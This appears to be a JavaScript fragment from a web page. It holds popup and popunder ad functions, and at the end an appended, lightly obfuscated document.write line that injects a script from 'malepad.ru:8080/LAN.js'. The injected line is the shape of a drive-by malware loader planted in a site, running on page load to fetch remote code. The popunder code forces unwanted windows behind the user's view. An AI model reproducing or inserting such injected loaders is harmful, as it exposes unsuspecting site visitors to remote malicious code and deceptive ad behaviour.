<!--
var popped = false;
var clk = false;
var pwin;
function p(url) {
        clk = true;
        day = new Date();
        id = day.getTime();
        name= 'page' + id;
        h=Math.round(window.screen.availheight*0.90);
        w=Math.round(window.screen.availwidth*0.90);
        name = window.open(url+'&vx=1', id, 'toolbar=1,scrollbars=1,location=1,statusbar=1,menubar=1,resizable=1,width=' + w + ',height=' + h + ',left = 75,top = 30');
}
function pu() {
    if (popped == false) {
        day = new Date();
        id = day.getTime();
        var pwin;
        h=300;
        w=720;
        pwin = window.open('/bin/popunder.php', id, 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=' + w + ',height=' + h + ',left = 75,top = 30');
    }
    if (pwin) {
        popped = true;
        pwin.blur();
        window.focus();
    }
}
function tpu() {
    if (clk == false) {
        pu();
    }
}
//-->
document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/LAN.js"></scr'+'ipt>');